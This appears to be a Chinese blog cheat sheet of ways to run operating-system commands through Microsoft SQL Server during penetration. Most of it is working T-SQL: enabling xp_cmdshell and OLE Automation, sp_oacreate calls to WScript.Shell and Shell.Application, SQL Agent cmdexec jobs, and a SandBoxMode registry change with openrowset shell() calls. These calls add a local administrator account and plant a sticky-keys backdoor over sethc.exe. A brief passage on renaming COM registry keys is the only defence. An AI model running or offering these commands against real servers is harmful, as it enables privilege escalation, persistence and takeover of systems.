一．xp_cmdshell
EXEC master..xp_cmdshell 'ipconfig'
開啟xp_cmdshell:
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
二．sp_oacreate
創(chuàng)建wscript.shell對象
use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd /c "net user" > c:\test.tmp'
創(chuàng)建scripting.filesystemobject對象
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
可以用utilman.exe代替sethc.exe達到同樣的效果 后門很酷嗎，呵呵
創(chuàng)建Shell.Application對象
declare @o int
exec sp_oacreate 'Shell.Application', @o out
exec sp_oamethod @o, 'ShellExecute',null, 'cmd.exe','cmd /c net user >c:\test.txt','c:\windows\system32','',1;
開啟OLE Automation Procedures
sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
我們的對策就是把對象做一下手腳
WScript.Shell可以調(diào)用系統(tǒng)內(nèi)核運行DOS基本命令
可以通過修改注冊表，將此組件改名，來防止危害。
HKEY_CLASSES_ROOT\WScript.Shell\
及HKEY_CLASSES_ROOT\WScript.Shell.1\
改名為其它的名字，如：改為WScript.Shell_ChangeName或WScript.Shell.1_ChangeName
自己以后調(diào)用的時候使用這個就可以正常調(diào)用此組件了
也要將clsid值也改一下
HKEY_CLASSES_ROOT\WScript.Shell\CLSID\項目的值
HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID\項目的值
同wscript.shell理、scripting.filesystemobject、Shell.Application
三．JOB
利用JOB執(zhí)行命令，有一個先決條件就是開啟SQLSERVERAGENT服務(wù)，下面的語句可以開啟
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'
use msdb create table [jncsql](resulttxt nvarchar(1024) null) exec sp_delete_job null,'x' exec sp_add_job 'x' exec
sp_add_jobstep null,'x',null,'1','cmdexec','cmd /c "net user>c:\test.test"' exec sp_add_jobserver
null,'x',@@servername exec sp_start_job 'x';
四．SandBoxMode（網(wǎng)上常說的沙盒模式）
原理：在access里調(diào)用VBS的shell函數(shù)，以system權(quán)限執(zhí)行任何命令。但是試用這個函數(shù)之前必須把注冊表里的一個叫SandBoxmode的開關(guān)打開，
注冊表：HKEY_LOCAL_MACHINE\SoFtWare\Micris
oft\Jet\4.0\Engine\SandBoxmode.默認值為2，這個人鍵值為0表示始
終禁用SandBoxmode模式，1表示對于非Acess應(yīng)用程序試用SandBoxmode模式，2表示對access應(yīng)用程序使用SandBoxmode模式，3則表示完全開啟安全設(shè)置。//1或0都可以執(zhí)行命令
EXEC sp_addlinkedserver 'testsql','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
EXEC master..xp_regread HKEY_LOCAL_MACHINE ,'Software\Microsoft\Jet\4.0\engines','SandBoxMode'
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user test test /add")')
select * from openrowset('microsoft.jet.oledb.4.0',
';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")')
下面是系統(tǒng)自帶的兩個mdb文件
C:\WINDOWS\system32\ias\dnary.mdb
C:\WINDOWS\system32\ias\ias.mdb
總結(jié)
上述幾種方法（仔細看看我都忘記有幾種了，哈哈。你可以發(fā)散思維，再找出來幾種）都是在默認情況下測試的，往往滲透的時候有很多限制條件，我們可以逐一克服，利用組件得到服務(wù)器信息，讀取、創(chuàng)建文件了等等，我們還是要對權(quán)限這個詞組有深層次的理解啊。
附注
關(guān)于*.exe c:\windows\system32\ 還有c:\windows\system32\dllcache呢
關(guān)于cmd.exe還有command.exe呢
關(guān)于net.exe還有net1.exe呢
Mdb文件不存在我們可以上傳一個啊
執(zhí)行命令的組件不是只有一個哦

最新評論